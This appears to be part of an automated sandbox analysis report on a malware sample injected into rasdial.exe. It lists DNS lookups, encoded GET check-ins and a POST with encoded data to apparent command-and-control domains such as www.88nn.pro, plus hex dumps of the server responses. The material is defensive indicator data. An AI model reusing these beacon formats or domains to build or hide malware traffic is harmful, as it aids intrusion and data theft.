Source: global traffic | HTTP traffic detected: GET /l4rw/?r8=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&VZ=qzwLUJ3Xbb28 HTTP/1.1 | Host: www.88nn.pro | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /t3gh/?r8=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&VZ=qzwLUJ3Xbb28 HTTP/1.1 | Host: www.fontanerourgente.net | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /zctj/?r8=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&VZ=qzwLUJ3Xbb28 HTTP/1.1 | Host: www.onlytradez.club | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /kyiu/?VZ=qzwLUJ3Xbb28&r8=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k= HTTP/1.1 | Host: www.32wxd.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /f9bc/?r8=6SLGUfBvDKizOJgh7zQ0wdcCvGBSm89i7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPA9ia3C50a/z/OeG1bPlxFxHVM2abTu6B/y8=&VZ=qzwLUJ3Xbb28 HTTP/1.1 | Host: www.jaxo.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s= HTTP/1.1 | Host: www.xforum.tech | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /l90v/?r8=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&VZ=qzwLUJ3Xbb28 HTTP/1.1 | Host: www.cannulafactory.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /rgqx/?r8=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&VZ=qzwLUJ3Xbb28 HTTP/1.1 | Host: www.ayypromo.shop | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp; rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: <li id="menu-item-19" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-19"><a href="https://www.facebook.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M12 2C6.5 2 2 6.5 2 12c0 5 3.7 9.1 8.4 9.9v-7H7.9V12h2.5V9.8c0-2.5 1.5-3.9 3.8-3.9 1.1 0 2.2.2 2.2.2v2.5h-1.3c-1.2 0-1.6.8-1.6 1.6V12h2.8l-.4 2.9h-2.3v7C18.3 21.1 22 17 22 12c0-5.5-4.5-10-10-10z"></path></svg><span class="screen-reader-text">Facebook</a></li> equals www.facebook.com (Facebook)
Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp; rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: <li id="menu-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a href="https://twitter.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M22.23,5.924c-0.736,0.326-1.527,0.547-2.357,0.646c0.847-0.508,1.498-1.312,1.804-2.27 c-0.793,0.47-1.671,0.812-2.606,0.996C18.324,4.498,17.257,4,16.077,4c-2.266,0-4.103,1.837-4.103,4.103 c0,0.322,0.036,0.635,0.106,0.935C8.67,8.867,5.647,7.234,3.623,4.751C3.27,5.357,3.067,6.062,3.067,6.814 c0,1.424,0.724,2.679,1.825,3.415c-0.673-0.021-1.305-0.206-1.859-0.513c0,0.017,0,0.034,0,0.052c0,1.988,1.414,3.647,3.292,4.023 c-0.344,0.094-0.707,0.144-1.081,0.144c-0.264,0-0.521-0.026-0.772-0.074c0.522,1.63,2.038,2.816,3.833,2.85 c-1.404,1.1-3.174,1.756-5.096,1.756c-0.331,0-0.658-0.019-0.979-0.057c1.816,1.164,3.973,1 equals www.twitter.com (Twitter)
(Both strings are fragments of a generic WordPress theme menu held in the injected processes' memory: the response bodies the check-in domains return are ordinary-looking web pages, not obviously C2 content.)
            Source: global traffic | DNS traffic detected: DNS query: www.weep.site
            Source: global traffic | DNS traffic detected: DNS query: www.88nn.pro
            Source: global traffic | DNS traffic detected: DNS query: www.fontanerourgente.net
            Source: global traffic | DNS traffic detected: DNS query: www.onlytradez.club
            Source: global traffic | DNS traffic detected: DNS query: www.32wxd.top
            Source: global traffic | DNS traffic detected: DNS query: www.jaxo.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.xforum.tech
            Source: global traffic | DNS traffic detected: DNS query: www.cannulafactory.top
            Source: global traffic | DNS traffic detected: DNS query: www.taapbit.online
            Source: global traffic | DNS traffic detected: DNS query: www.ayypromo.shop
            Source: global traffic | DNS traffic detected: DNS query: www.anaidittrich.com
            Source: unknown | HTTP traffic detected: POST /l4rw/ HTTP/1.1
                Host: www.88nn.pro
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                Accept-Language: en-US,en;q=0.5
                Accept-Encoding: gzip, deflate
                Origin: http://www.88nn.pro
                Referer: http://www.88nn.pro/l4rw/
                Cache-Control: max-age=0
                Connection: close
                Content-Length: 199
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                Data Raw: 72 38 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 78 2b 74 49 69 4a 6f 4d 35 73 50 69 44 6b 76 54 46 30 41 36 76 46 72 4f 38 57 78 32 34 43 70 48 77 3d 3d
                Data Ascii: r8=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkx+tIiJoM5sPiDkvTF0A6vFrO8Wx24CpHw==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:53:32 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 
32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 03 Sep 2024 11:53:48 GMT
                Content-Type: text/html
                Content-Length: 138
                Connection: close
                ETag: "667cd175-8a"
                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 03 Sep 2024 11:53:51 GMT
                Content-Type: text/html
                Content-Length: 138
                Connection: close
                ETag: "667cd175-8a"
                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 03 Sep 2024 11:53:53 GMT
                Content-Type: text/html
                Content-Length: 138
                Connection: close
                ETag: "667cd175-8a"
                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 03 Sep 2024 11:53:56 GMT
                Content-Type: text/html
                Content-Length: 138
                Connection: close
                ETag: "667cd175-8a"
                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:02 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 
74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:04 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 
74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:07 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 